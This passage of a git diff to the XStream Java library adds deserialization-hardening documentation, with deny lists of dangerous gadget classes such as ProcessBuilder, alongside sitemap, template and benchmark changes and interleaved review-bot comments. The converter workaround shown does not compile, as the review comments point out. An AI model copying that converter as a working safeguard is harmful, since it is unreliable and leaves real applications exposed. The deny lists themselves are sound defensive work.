+xstream.denyTypeHierarchy(javax.activation.DataSource.class ); +xstream.denyTypeHierarchy(javax.sql.rowset.BaseRowSet.class ); +</pre></div> + + <p>Users of XStream 1.4.13 and 1.4.14 should add these lines and <strong>additionally</strong> the lines for version 1.4.15 to 1.4.17:</p></p> +<div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter" }); +xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class }); +</pre></div> + + <p>Users of XStream 1.4.7 to 1.4.12 who want to use XStream with a blacklist will have to setup such a list from + scratch:</p> +<div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "sun.awt.datatransfer.DataTransferer$IndexOrderComparator", "com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator" }); +xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class }); +xstream.denyTypesByRegExp(new String[]{ ".*\\$ServiceNameIterator", "javafx\\.collections\\.ObservableList\\$.*", ".*\\.bcel\\..*\\.util\\.ClassLoader", ".*\\$GetterSetterReflection", ".*\\$LazyIterator", ".*\\$PrivilegedGetter", ".*\\.ws\\.client\\.sei\\..*", ".*\\$ProxyLazyValue", "com\\.sun\\.jndi\\..*Enumerat(?:ion|tor)", ".*\\$URLData" }); +xstream.denyTypesByWildcard(new String[]{ "sun.reflect.**", "sun.tracing.**", "com.sun.corba.**" }); +xstream.denyTypeHierarchy(java.io.InputStream.class); +xstream.denyTypeHierarchy(java.nio.channels.Channel.class); +xstream.denyTypeHierarchy(javax.activation.DataSource.class); +xstream.denyTypeHierarchy(javax.sql.rowset.BaseRowSet.class); +</pre></div> + + <p>Users of XStream 1.4.6 or below can register an own converter to prevent the unmarshalling of the currently + know critical types of the Java runtime. 
It is in fact an updated version of the workaround for CVE-2013-7285:</p> +<div class="Source Java"><pre>xstream.registerConverter(new Converter() { + public boolean canConvert(Class type) { + return type != null + && (type == java.beans.EventHandler.class || type == java.lang.ProcessBuilder.class || type == java.lang.Void.class || void.class + || type.getName().equals("javax.imageio.ImageIO$ContainsFilter") || type.getName().equals("sun.awt.datatransfer.DataTransferer$IndexOrderComparator") || type.getName().equals("com.sun.corba.se.impl.activation.ServerTableEntry") || type.getName().equals("com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator") + || type.getName().matches("javafx\\.collections\\.ObservableList\\$.*") || type.getName().matches(".*\\$ServiceNameIterator") || type.getName().matches(".*\\$GetterSetterReflection") || type.getName().matches(".*\\$LazyIterator") || type.getName().matches(".*\\$ProxyLazyValue") || type.getName().matches(".*\\.bcel\\..*\\.util\\.ClassLoader") || type.getName().matches(".*\\.ws\\.client\\.sei\\..*") || type.getName().matches("com\\.sun\\.jndi\\..*Enumerat(?:ion|tor)") || type.getName().matches(".*\\$URLData") + || type.getName().startsWith("sun.reflect.") || type.getName().startsWith("sun.tracing.") || type.getName().startsWith("com.sun.corba.") + || java.io.InputStream.class.isAssignableFrom(type) || java.nio.channels.Channel.isAssignableFrom(type) || javax.activation.DataSource.isAssignableFrom(type) ||javax.sql.rowset.BaseRowSet.isAssignableFrom(type) + || Proxy.isProxy(type)); + } + + public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) { + throw new ConversionException("Unsupported type due to security reasons."); + } + + public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) { + throw new ConversionException("Unsupported type due to security reasons."); + } +}, XStream.PRIORITY_VERY_HIGH); +</pre></div> + </body> 
</html> diff --git a/xstream-distribution/src/content/website.xml b/xstream-distribution/src/content/website.xml index c01aa060403255a28654c40900f9812025af1370..157baeb93a52f8809c115a700d0eca09ffe88922 100644 --- a/xstream-distribution/src/content/website.xml +++ b/xstream-distribution/src/content/website.xml @@ -1,6 +1,6 @@ <!-- Copyright (C) 2005, 2006 Joe Walnes. - Copyright (C) 2006, 2007, 2010, 2011, 2014, 2015, 2016, 2017, 2020 XStream committers. + Copyright (C) 2006, 2007, 2010, 2011, 2014, 2015, 2016, 2017, 2020, 2021 XStream committers. All rights reserved. The software in this package is published under the terms of the BSD @@ -15,13 +15,12 @@ <page>index.html</page> <page>news.html</page> <page>changes.html</page> + <page>security.html</page> <page>versioning.html</page> </section> <section> <name>Evaluating XStream</name> <page>tutorial.html</page> - <page>graphs.html</page> - <page>manual-tweaking-output.html</page> <page>license.html</page> <page>download.html</page> <page>references.html</page> @@ -31,8 +30,9 @@ <section> <name>Using XStream</name> <page>architecture.html</page> + <page>graphs.html</page> + <page>manual-tweaking-output.html</page> <page>converters.html</page> - <page>security.html</page> <page>faq.html</page> <page>mailing-lists.html</page> <page>issues.html</page> @@ -43,15 +43,6 @@ <link title="Hibernate Extensions">hibernate-javadoc/index.html</link> <link title="JMH Module">jmh-javadoc/index.html</link> </section> - <section> - <name>Vulnerabilities</name> - <page>CVE-2020-26259.html</page> - <page>CVE-2020-26258.html</page> - <page>CVE-2020-26217.html</page> - <page>CVE-2017-7957.html</page> - <page>CVE-2016-3674.html</page> - <page>CVE-2013-7285.html</page> - </section> <section> <name>Tutorials</name> <page>tutorial.html</page> 
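Review bot: The 1.4.17 snippet in the new "Workarounds for older XStream versions" section contains a regular expression with a stray comma, `"com\\.sun\\.jndi\\..*Enumerat(?:ion|tor),.*\\$URLData"`, which turns two intended patterns into one that requires a literal comma in the class name, so neither the JNDI enumerator types nor the `$URLData` types would be denied by anyone who pastes it; the 1.4.7 to 1.4.12 snippet further down lists them correctly as two entries, `"com\\.sun\\.jndi\\..*Enumerat(?:ion|tor)", ".*\\$URLData"`. The converter-based workaround for 1.4.6 and below also does not compile as written: `|| void.class` is not a boolean expression and should read `|| type == void.class`, and `java.nio.channels.Channel.isAssignableFrom(type)`, `javax.activation.DataSource.isAssignableFrom(type)` and `javax.sql.rowset.BaseRowSet.isAssignableFrom(type)` are missing `.class` before `isAssignableFrom`, unlike the `java.io.InputStream.class.isAssignableFrom(type)` term on the same line. The `denyTypes(new Class[]{...})` line for 1.4.7 to 1.4.12 lists `java.lang.ProcessBuilder.class` twice, which is harmless but worth trimming. Since these snippets are meant to be pasted into production setup code as a protective measure, they deserve a compile check against the 1.4.x API before the page is published.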
@@ -70,4 +61,39 @@ <page>repository.html</page> <link title="Continuous Integration">https://travis-ci.org/x-stream/xstream/branches</link> </section> + <section> + <name>!Vulnerabilities</name> + <page>CVE-2021-21341.html</page> + <page>CVE-2021-21342.html</page> + <page>CVE-2021-21343.html</page> + <page>CVE-2021-21344.html</page> + <page>CVE-2021-21345.html</page> + <page>CVE-2021-21346.html</page> + <page>CVE-2021-21347.html</page> + <page>CVE-2021-21348.html</page> + <page>CVE-2021-21349.html</page> + <page>CVE-2021-21350.html</page> + <page>CVE-2021-21351.html</page> + <page>CVE-2021-29505.html</page> + <page>CVE-2021-39139.html</page> + <page>CVE-2021-39140.html</page> + <page>CVE-2021-39141.html</page> + <page>CVE-2021-39144.html</page> + <page>CVE-2021-39145.html</page> + <page>CVE-2021-39146.html</page> + <page>CVE-2021-39147.html</page> + <page>CVE-2021-39148.html</page> + <page>CVE-2021-39149.html</page> + <page>CVE-2021-39150.html</page> + <page>CVE-2021-39151.html</page> + <page>CVE-2021-39152.html</page> + <page>CVE-2021-39153.html</page> + <page>CVE-2021-39154.html</page> + <page>CVE-2020-26217.html</page> + <page>CVE-2020-26258.html</page> + <page>CVE-2020-26259.html</page> + <page>CVE-2017-7957.html</page> + <page>CVE-2016-3674.html</page> + <page>CVE-2013-7285.html</page> + </section> </sitemap> diff --git a/xstream-distribution/src/templates/skin.html b/xstream-distribution/src/templates/skin.html index d2dc8e2776d6c32598fca0faf0385d86ac5c9347..425d3faad11539b18168de6b4c7b41d42d6c1979 100644 --- a/xstream-distribution/src/templates/skin.html +++ b/xstream-distribution/src/templates/skin.html @@ -2,7 +2,7 @@ <html xmlns="http://www.w3.org/1999/xhtml"> <!-- Copyright (C) 2005, 2006 Joe Walnes. - Copyright (C) 2006, 2007, 2008 XStream committers. + Copyright (C) 2006, 2007, 2008, 2021 XStream committers. All rights reserved. The software in this package is published under the terms of the BSD 
@@ -44,18 +44,20 @@ <div class="SidePanel" id="left"> <#list sitemap.sections as section> - <div class="MenuGroup"> - <h1>${section.name}</h1> - <ul> - <#list section.entries as entry> - <#if entry = page> - <li class="currentLink">${entry.title}</li> - <#else> - <li><a href="${entry.href}">${entry.title}</a></li> - </#if> - </#list> - </ul> - </div> + <#if !section.name?starts_with("!")> + <div class="MenuGroup"> + <h1>${section.name}</h1> + <ul> + <#list section.entries as entry> + <#if entry = page> + <li class="currentLink">${entry.title}</li> + <#else> + <li><a href="${entry.href}">${entry.title}</a></li> + </#if> + </#list> + </ul> + </div> + </#if> </#list> </div> diff --git a/xstream-hibernate/pom.xml b/xstream-hibernate/pom.xml index d50dd6fa80be9acaa48d4019c2315cc58fa5f4ca..24eb7ab15764a1783d8b1fee6877324db52c3872 100644 --- a/xstream-hibernate/pom.xml +++ b/xstream-hibernate/pom.xml @@ -13,7 +13,7 @@ <parent> <groupId>com.thoughtworks.xstream</groupId> <artifactId>xstream-parent</artifactId> - <version>1.4.15</version> + <version>1.4.18</version> </parent> <artifactId>xstream-hibernate</artifactId> <packaging>jar</packaging> diff --git a/xstream-jmh/pom.xml b/xstream-jmh/pom.xml index 604090bb5f8cc940384ac6261dfd3415d351d937..f043917762b4698ff56553c19d5a4e458a983baa 100644 --- a/xstream-jmh/pom.xml +++ b/xstream-jmh/pom.xml @@ -1,6 +1,6 @@ <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd"> <!-- - Copyright (C) 2015, 2017, 2020 XStream committers. + Copyright (C) 2015, 2017, 2020, 2021 XStream committers. All rights reserved. The software in this package is published under the terms of the BSD 
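Review bot: The new `<#if !section.name?starts_with("!")>` guard in skin.html introduces a naming convention — a sitemap section whose name begins with "!" (the `!Vulnerabilities` section added to website.xml in this commit) stays in the sitemap but is not rendered in the side menu — and nothing in the template explains it. A one-line FreeMarker comment directly above the guard, `<#-- sections whose name starts with "!" are kept in the sitemap but hidden from the side menu -->`, would spare the next editor from guessing why a section disappeared from navigation. The same convention should be mentioned next to the section in website.xml, since that is where a future section name will be typed.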
@@ -13,7 +13,7 @@ <parent> <groupId>com.thoughtworks.xstream</groupId> <artifactId>xstream-parent</artifactId> - <version>1.4.15</version> + <version>1.4.18</version> </parent> <artifactId>xstream-jmh</artifactId> <packaging>jar</packaging> @@ -175,13 +175,13 @@ </dependency> <!-- parser --> <dependency> - <groupId>xpp3</groupId> - <artifactId>xpp3_min</artifactId> + <groupId>io.github.x-stream</groupId> + <artifactId>mxparser</artifactId> <scope>runtime</scope> </dependency> <dependency> - <groupId>xmlpull</groupId> - <artifactId>xmlpull</artifactId> + <groupId>xpp3</groupId> + <artifactId>xpp3_min</artifactId> <scope>runtime</scope> </dependency> <dependency> diff --git a/xstream-jmh/src/java/com/thoughtworks/xstream/benchmark/jmh/ConverterTypeBenchmark.java b/xstream-jmh/src/java/com/thoughtworks/xstream/benchmark/jmh/ConverterTypeBenchmark.java index 85fe8155824718784eebf5551f54e0ba4b1a0f7b..8b01de10889fd939fae9f5e93870e85aa58c973c 100644 --- a/xstream-jmh/src/java/com/thoughtworks/xstream/benchmark/jmh/ConverterTypeBenchmark.java +++ b/xstream-jmh/src/java/com/thoughtworks/xstream/benchmark/jmh/ConverterTypeBenchmark.java @@ -1,12 +1,12 @@ /* - * Copyright (C) 2015, 2017 XStream Committers. + * Copyright (C) 2015, 2017, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD * style license a copy of which has been included with this distribution in * the LICENSE.txt file. * - * Created on 20.11.2015 by Joerg Schaible + * Created on 20 November 2015 by Joerg Schaible */ package com.thoughtworks.xstream.benchmark.jmh; 
@@ -37,7 +37,7 @@ import com.thoughtworks.xstream.converters.javabean.JavaBeanConverter; import com.thoughtworks.xstream.converters.reflection.ReflectionConverter; import com.thoughtworks.xstream.io.HierarchicalStreamReader; import com.thoughtworks.xstream.io.HierarchicalStreamWriter; -import com.thoughtworks.xstream.io.xml.Xpp3Driver; +import com.thoughtworks.xstream.io.xml.MXParserDriver; import com.thoughtworks.xstream.security.ArrayTypePermission; import com.thoughtworks.xstream.security.NoTypePermission; import com.thoughtworks.xstream.security.PrimitiveTypePermission; @@ -230,7 +230,7 @@ public class ConverterTypeBenchmark { */ @Setup(Level.Trial) public void setUp(final BenchmarkParams params) { - xstream = new XStream(new Xpp3Driver()); + xstream = new XStream(new MXParserDriver()); xstream.addPermission(NoTypePermission.NONE); xstream.addPermission(ArrayTypePermission.ARRAYS); xstream.addPermission(PrimitiveTypePermission.PRIMITIVES); diff --git a/xstream-jmh/src/java/com/thoughtworks/xstream/benchmark/jmh/ParserBenchmark.java b/xstream-jmh/src/java/com/thoughtworks/xstream/benchmark/jmh/ParserBenchmark.java index a6b504225b9909eb9ee02c582ea27c3942b27291..b2f83bdadacaed9985d22bb0a0b28bc7a29b9384 100644 --- a/xstream-jmh/src/java/com/thoughtworks/xstream/benchmark/jmh/ParserBenchmark.java +++ b/xstream-jmh/src/java/com/thoughtworks/xstream/benchmark/jmh/ParserBenchmark.java @@ -1,5 +1,5 @@ /* - * Copyright (C) 2015, 2017 XStream Committers. + * Copyright (C) 2015, 2017, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD 
@@ -44,6 +44,7 @@ import com.thoughtworks.xstream.io.xml.DomDriver; import com.thoughtworks.xstream.io.xml.JDom2Driver; import com.thoughtworks.xstream.io.xml.JDomDriver; import com.thoughtworks.xstream.io.xml.KXml2Driver; +import com.thoughtworks.xstream.io.xml.MXParserDriver; import com.thoughtworks.xstream.io.xml.PrettyPrintWriter; import com.thoughtworks.xstream.io.xml.StandardStaxDriver; import com.thoughtworks.xstream.io.xml.WstxDriver; @@ -76,6 +77,12 @@ public class ParserBenchmark { * @since 1.4.9 */ public enum DriverFactory { + /** + * Factory for the {@link MXParserDriver}. + * + * @since 1.4.16 + */ + MXParser(new MXParserDriver()), // /** * Factory for the {@link Xpp3Driver}. * diff --git a/xstream-jmh/src/java/com/thoughtworks/xstream/benchmark/jmh/StringConverterBenchmark.java b/xstream-jmh/src/java/com/thoughtworks/xstream/benchmark/jmh/StringConverterBenchmark.java index 2ccb72128478801f05200867def18dde7b104ccd..5a74fdbe158286147ffafbbb4970b25a3207fea0 100644 --- a/xstream-jmh/src/java/com/thoughtworks/xstream/benchmark/jmh/StringConverterBenchmark.java +++ b/xstream-jmh/src/java/com/thoughtworks/xstream/benchmark/jmh/StringConverterBenchmark.java @@ -1,12 +1,12 @@ /* - * Copyright (C) 2015, 2017 XStream Committers. + * Copyright (C) 2015, 2017, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD * style license a copy of which has been included with this distribution in * the LICENSE.txt file. * - * Created on 08.11.2015 by Joerg Schaible + * Created on 8. November 2015 by Joerg Schaible */ package com.thoughtworks.xstream.benchmark.jmh; 
@@ -37,6 +37,7 @@ import com.thoughtworks.xstream.converters.SingleValueConverter; import com.thoughtworks.xstream.converters.basic.AbstractSingleValueConverter; import com.thoughtworks.xstream.core.util.WeakCache; import com.thoughtworks.xstream.io.xml.CompactWriter; +import com.thoughtworks.xstream.io.xml.MXParserDriver; import com.thoughtworks.xstream.io.xml.PrettyPrintWriter; import com.thoughtworks.xstream.io.xml.Xpp3Driver; import com.thoughtworks.xstream.security.ArrayTypePermission; @@ -257,7 +258,7 @@ public class StringConverterBenchmark { } else { throw new IllegalStateException("Unsupported benchmark type: " + benchmark); } - xstream = new XStream(new Xpp3Driver()); + xstream = new XStream(new MXParserDriver()); xstream.addPermission(NoTypePermission.NONE); xstream.addPermission(ArrayTypePermission.ARRAYS); xstream.allowTypes(new Class[] {String.class}); diff --git a/xstream-jmh/src/reference/base64.txt b/xstream-jmh/src/reference/base64.txt index dafa1864538b45fed8f7898a8c38bdb0b13ba777..e7d5eea5b002128c89c14ee58c16cbd5cd4797f3 100644 --- a/xstream-jmh/src/reference/base64.txt +++ b/xstream-jmh/src/reference/base64.txt 
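Review bot: The import hunk of StringConverterBenchmark adds `MXParserDriver` but keeps `import com.thoughtworks.xstream.io.xml.Xpp3Driver;`, while the only construction visible in this commit, in the second hunk, switches from `new Xpp3Driver()` to `new MXParserDriver()`. If Xpp3Driver is not referenced elsewhere in the file, that import is now unused and should be removed, which is what ConverterTypeBenchmark does in the same commit by replacing its import instead of adding one. The enclosing method of the second hunk starts and ends outside the hunk, so I cannot tell from here whether another use remains.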
@@ -1,32 +1,31 @@ Benchmark (codec) (data) (driverFactory) (operation) Mode Cnt Score Error Units -Base64Benchmark.run xstreamInternal small N/A encode avgt 16 426.295 ± 30.263 ns/op -Base64Benchmark.run xstreamInternal small N/A decode avgt 16 390.516 ± 4.600 ns/op -Base64Benchmark.run xstreamInternal medium N/A encode avgt 16 78991.509 ± 172.426 ns/op -Base64Benchmark.run xstreamInternal medium N/A decode avgt 16 96237.821 ± 8716.671 ns/op -Base64Benchmark.run xstreamInternal big N/A encode avgt 16 28024694.588 ± 777818.782 ns/op -Base64Benchmark.run xstreamInternal big N/A decode avgt 16 26005576.460 ± 95469.494 ns/op -Base64Benchmark.run dataTypeConverter small N/A encode avgt 16 116.346 ± 4.724 ns/op -Base64Benchmark.run dataTypeConverter small N/A decode avgt 16 144.778 ± 4.741 ns/op -Base64Benchmark.run dataTypeConverter medium N/A encode avgt 16 20738.849 ± 96.411 ns/op -Base64Benchmark.run dataTypeConverter medium N/A decode avgt 16 26443.941 ± 35.307 ns/op -Base64Benchmark.run dataTypeConverter big N/A encode avgt 16 10402424.065 ± 292760.969 ns/op -Base64Benchmark.run dataTypeConverter big N/A decode avgt 16 7684177.150 ± 452226.536 ns/op -Base64Benchmark.run javaUtil small N/A encode avgt 16 96.584 ± 0.382 ns/op -Base64Benchmark.run javaUtil small N/A decode avgt 16 83.813 ± 2.605 ns/op -Base64Benchmark.run javaUtil medium N/A encode avgt 16 14990.533 ± 1510.286 ns/op -Base64Benchmark.run javaUtil medium N/A decode avgt 16 13194.678 ± 21.584 ns/op -Base64Benchmark.run javaUtil big N/A encode avgt 16 6210509.128 ± 70567.009 ns/op -Base64Benchmark.run javaUtil big N/A decode avgt 16 5379677.044 ± 162435.588 ns/op -Base64Benchmark.run commonsCodec small N/A encode avgt 16 6402.767 ± 13.172 ns/op -Base64Benchmark.run commonsCodec small N/A decode avgt 16 6325.007 ± 7.691 ns/op -Base64Benchmark.run commonsCodec medium N/A encode avgt 16 68730.521 ± 2538.713 ns/op -Base64Benchmark.run commonsCodec medium N/A decode avgt 16 65192.120 ± 4534.865 ns/op 
-Base64Benchmark.run commonsCodec big N/A encode avgt 16 30413559.920 ± 211444.968 ns/op -Base64Benchmark.run commonsCodec big N/A decode avgt 16 21816582.642 ± 616700.770 ns/op -Base64Benchmark.run migBase small N/A encode avgt 16 98.949 ± 2.753 ns/op -Base64Benchmark.run migBase small N/A decode avgt 16 124.609 ± 0.332 ns/op -Base64Benchmark.run migBase medium N/A encode avgt 16 19505.761 ± 1294.819 ns/op -Base64Benchmark.run migBase medium N/A decode avgt 16 27299.148 ± 908.642 ns/op -Base64Benchmark.run migBase big N/A encode avgt 16 9984923.156 ± 13611.711 ns/op -Base64Benchmark.run migBase big N/A decode avgt 16 5733157.575 ± 32241.447 ns/op - +Base64Benchmark.run xstreamInternal small N/A encode avgt 16 422.691 ± 0.805 ns/op +Base64Benchmark.run xstreamInternal small N/A decode avgt 16 401.744 ± 41.549 ns/op +Base64Benchmark.run xstreamInternal medium N/A encode avgt 16 87980.151 ± 1758.463 ns/op +Base64Benchmark.run xstreamInternal medium N/A decode avgt 16 90334.626 ± 272.486 ns/op +Base64Benchmark.run xstreamInternal big N/A encode avgt 16 26829622.608 ± 219338.574 ns/op +Base64Benchmark.run xstreamInternal big N/A decode avgt 16 25760733.427 ± 892724.693 ns/op +Base64Benchmark.run dataTypeConverter small N/A encode avgt 16 116.452 ± 4.685 ns/op +Base64Benchmark.run dataTypeConverter small N/A decode avgt 16 156.041 ± 0.232 ns/op +Base64Benchmark.run dataTypeConverter medium N/A encode avgt 16 22025.833 ± 871.377 ns/op +Base64Benchmark.run dataTypeConverter medium N/A decode avgt 16 29199.416 ± 1366.584 ns/op +Base64Benchmark.run dataTypeConverter big N/A encode avgt 16 10173025.627 ± 14375.190 ns/op +Base64Benchmark.run dataTypeConverter big N/A decode avgt 16 7645745.427 ± 378490.086 ns/op +Base64Benchmark.run javaUtil small N/A encode avgt 16 113.013 ± 10.478 ns/op +Base64Benchmark.run javaUtil small N/A decode avgt 16 83.877 ± 0.298 ns/op +Base64Benchmark.run javaUtil medium N/A encode avgt 16 14425.936 ± 39.693 ns/op +Base64Benchmark.run javaUtil 
medium N/A decode avgt 16 13846.668 ± 779.799 ns/op +Base64Benchmark.run javaUtil big N/A encode avgt 16 6149989.342 ± 199233.302 ns/op +Base64Benchmark.run javaUtil big N/A decode avgt 16 5342302.204 ± 18186.258 ns/op +Base64Benchmark.run commonsCodec small N/A encode avgt 16 6390.608 ± 72.975 ns/op +Base64Benchmark.run commonsCodec small N/A decode avgt 16 6385.171 ± 89.129 ns/op +Base64Benchmark.run commonsCodec medium N/A encode avgt 16 68085.447 ± 138.335 ns/op +Base64Benchmark.run commonsCodec medium N/A decode avgt 16 68183.900 ± 6315.687 ns/op +Base64Benchmark.run commonsCodec big N/A encode avgt 16 29120324.467 ± 745830.065 ns/op +Base64Benchmark.run commonsCodec big N/A decode avgt 16 22775668.935 ± 627458.817 ns/op +Base64Benchmark.run migBase small N/A encode avgt 16 107.834 ± 0.218 ns/op +Base64Benchmark.run migBase small N/A decode avgt 16 110.671 ± 5.789 ns/op +Base64Benchmark.run migBase medium N/A encode avgt 16 19048.637 ± 1321.623 ns/op +Base64Benchmark.run migBase medium N/A decode avgt 16 22464.136 ± 30.464 ns/op +Base64Benchmark.run migBase big N/A encode avgt 16 10101223.925 ± 193350.342 ns/op +Base64Benchmark.run migBase big N/A decode avgt 16 6967471.163 ± 405344.659 ns/op diff --git a/xstream-jmh/src/reference/converterType.txt b/xstream-jmh/src/reference/converterType.txt index da6c6bd6cc0a3a412027502be86630d75aa1842d..e2ce90c0215f5cca4139f930b0a7e51339df1d01 100644 --- a/xstream-jmh/src/reference/converterType.txt +++ b/xstream-jmh/src/reference/converterType.txt 
@@ -1,4 +1,4 @@ Benchmark Mode Cnt Score Error Units -ConverterTypeBenchmark.custom avgt 16 9511483.088 ± 319352.540 ns/op -ConverterTypeBenchmark.javaBean avgt 16 18956037.656 ± 1379941.067 ns/op -ConverterTypeBenchmark.reflection avgt 16 22467750.653 ± 26871.357 ns/op +ConverterTypeBenchmark.custom avgt 16 9324531.713 ± 12182.415 ns/op +ConverterTypeBenchmark.javaBean avgt 16 19658157.449 ± 84554.958 ns/op +ConverterTypeBenchmark.reflection avgt 16 20859870.075 ± 2470686.138 ns/op diff --git a/xstream-jmh/src/reference/nameCoder.txt b/xstream-jmh/src/reference/nameCoder.txt index a2fb2f3fd94f0c6c1bb7617d0adc36161cf71b76..c6fc3f8d2523b39647969f43269b29358ef382cd 100644 --- a/xstream-jmh/src/reference/nameCoder.txt +++ b/xstream-jmh/src/reference/nameCoder.txt @@ -1,6 +1,6 @@ Benchmark Mode Cnt Score Error Units -NameCoderBenchmark.cachedEscapedUnderscoreCoding avgt 25 4486384.078 ± 76466.208 ns/op -NameCoderBenchmark.dollarCoding avgt 25 5006636.275 ± 393688.573 ns/op -NameCoderBenchmark.escapedUnderscoreCoding avgt 25 6714770.410 ± 140953.970 ns/op -NameCoderBenchmark.noCoding avgt 25 4068459.179 ± 187522.480 ns/op -NameCoderBenchmark.xmlFriendlyCoding avgt 25 5017414.939 ± 233268.851 ns/op +NameCoderBenchmark.cachedEscapedUnderscoreCoding avgt 25 4339193.305 ± 117708.908 ns/op +NameCoderBenchmark.dollarCoding avgt 25 4570684.356 ± 169447.323 ns/op +NameCoderBenchmark.escapedUnderscoreCoding avgt 25 6322642.927 ± 176678.518 ns/op +NameCoderBenchmark.noCoding avgt 25 3917564.563 ± 150151.093 ns/op +NameCoderBenchmark.xmlFriendlyCoding avgt 25 5102368.550 ± 129434.626 ns/op diff --git a/xstream-jmh/src/reference/parsers.txt b/xstream-jmh/src/reference/parsers.txt index 9468ca478b091e5870b071fb3868a9e47e328dd6..4aa87f63989c036409d9488d2e9e30352539b4d1 100644 --- a/xstream-jmh/src/reference/parsers.txt +++ b/xstream-jmh/src/reference/parsers.txt 
@@ -1,37 +1,40 @@ Benchmark (driverFactory) Mode Cnt Score Error Units -ParserBenchmark.parseBigText Xpp3 avgt 15 2076542.383 ± 21070.325 ns/op -ParserBenchmark.parseBigText kXML2 avgt 15 3609529.640 ± 70339.168 ns/op -ParserBenchmark.parseBigText JDKStax avgt 15 8449107.541 ± 61967.793 ns/op -ParserBenchmark.parseBigText Woodstox avgt 15 1958090.473 ± 16778.643 ns/op -ParserBenchmark.parseBigText BEAStax avgt 15 3208123.897 ± 77313.722 ns/op -ParserBenchmark.parseBigText DOM avgt 15 10587727.502 ± 102744.156 ns/op -ParserBenchmark.parseBigText DOM4J avgt 15 8680900.188 ± 54539.385 ns/op -ParserBenchmark.parseBigText JDom avgt 15 6541414.372 ± 96753.674 ns/op -ParserBenchmark.parseBigText JDom2 avgt 15 5870155.438 ± 25749.627 ns/op -ParserBenchmark.parseBigText Xom avgt 15 8062184.585 ± 37582.497 ns/op -ParserBenchmark.parseBigText Binary avgt 15 1057890.361 ± 18005.100 ns/op -ParserBenchmark.parseBigText Jettison avgt 15 3610357.375 ± 8660.257 ns/op -ParserBenchmark.parseManyChildren Xpp3 avgt 15 717142.178 ± 9704.905 ns/op -ParserBenchmark.parseManyChildren kXML2 avgt 15 886358.766 ± 12643.107 ns/op -ParserBenchmark.parseManyChildren JDKStax avgt 15 771151.977 ± 10866.825 ns/op -ParserBenchmark.parseManyChildren Woodstox avgt 15 764703.865 ± 4983.789 ns/op -ParserBenchmark.parseManyChildren BEAStax avgt 15 862349.819 ± 23927.845 ns/op -ParserBenchmark.parseManyChildren DOM avgt 15 58925980.509 ± 521905.776 ns/op -ParserBenchmark.parseManyChildren DOM4J avgt 15 79133279.111 ± 1467045.110 ns/op -ParserBenchmark.parseManyChildren JDom avgt 15 6842504.530 ± 143906.198 ns/op -ParserBenchmark.parseManyChildren JDom2 avgt 15 9833407.570 ± 63131.868 ns/op -ParserBenchmark.parseManyChildren Xom avgt 15 33057256.100 ± 297855.633 ns/op -ParserBenchmark.parseManyChildren Binary avgt 15 385824.031 ± 2954.123 ns/op -ParserBenchmark.parseManyChildren Jettison avgt 15 594530.928 ± 4278.299 ns/op -ParserBenchmark.parseNestedElements Xpp3 avgt 15 12332209.281 ± 64122.445 ns/op 
-ParserBenchmark.parseNestedElements kXML2 avgt 15 37562872.191 ± 643160.833 ns/op -ParserBenchmark.parseNestedElements JDKStax avgt 15 630602.435 ± 5082.416 ns/op -ParserBenchmark.parseNestedElements Woodstox avgt 15 852446.766 ± 6384.039 ns/op -ParserBenchmark.parseNestedElements BEAStax avgt 15 798003.236 ± 20589.177 ns/op -ParserBenchmark.parseNestedElements DOM avgt 15 5547526.718 ± 38346.961 ns/op -ParserBenchmark.parseNestedElements DOM4J avgt 15 5501080.957 ± 46423.792 ns/op -ParserBenchmark.parseNestedElements JDom avgt 15 19329741.881 ± 366881.645 ns/op -ParserBenchmark.parseNestedElements JDom2 avgt 15 18291190.166 ± 54336.659 ns/op -ParserBenchmark.parseNestedElements Xom avgt 15 5842749.643 ± 55364.906 ns/op -ParserBenchmark.parseNestedElements Binary avgt 15 255649.550 ± 4896.859 ns/op -ParserBenchmark.parseNestedElements Jettison avgt 15 674957.675 ± 6296.073 ns/op +ParserBenchmark.parseBigText MXParser avgt 15 2131602.489 ± 25703.664 ns/op +ParserBenchmark.parseBigText Xpp3 avgt 15 2084284.951 ± 14376.744 ns/op +ParserBenchmark.parseBigText kXML2 avgt 15 3561706.234 ± 28443.949 ns/op +ParserBenchmark.parseBigText JDKStax avgt 15 8450930.541 ± 114260.574 ns/op +ParserBenchmark.parseBigText Woodstox avgt 15 1959085.951 ± 4958.052 ns/op +ParserBenchmark.parseBigText BEAStax avgt 15 3182516.188 ± 38272.584 ns/op +ParserBenchmark.parseBigText DOM avgt 15 10568442.558 ± 153957.726 ns/op +ParserBenchmark.parseBigText DOM4J avgt 15 8543670.534 ± 35374.800 ns/op +ParserBenchmark.parseBigText JDom avgt 15 6379300.940 ± 39285.532 ns/op +ParserBenchmark.parseBigText JDom2 avgt 15 5929805.928 ± 118564.329 ns/op +ParserBenchmark.parseBigText Xom avgt 15 7968868.873 ± 26730.256 ns/op +ParserBenchmark.parseBigText Binary avgt 15 1065228.134 ± 5642.331 ns/op +ParserBenchmark.parseBigText Jettison avgt 15 3682704.689 ± 56568.770 ns/op +ParserBenchmark.parseManyChildren MXParser avgt 15 814691.675 ± 3495.652 ns/op +ParserBenchmark.parseManyChildren Xpp3 avgt 15 
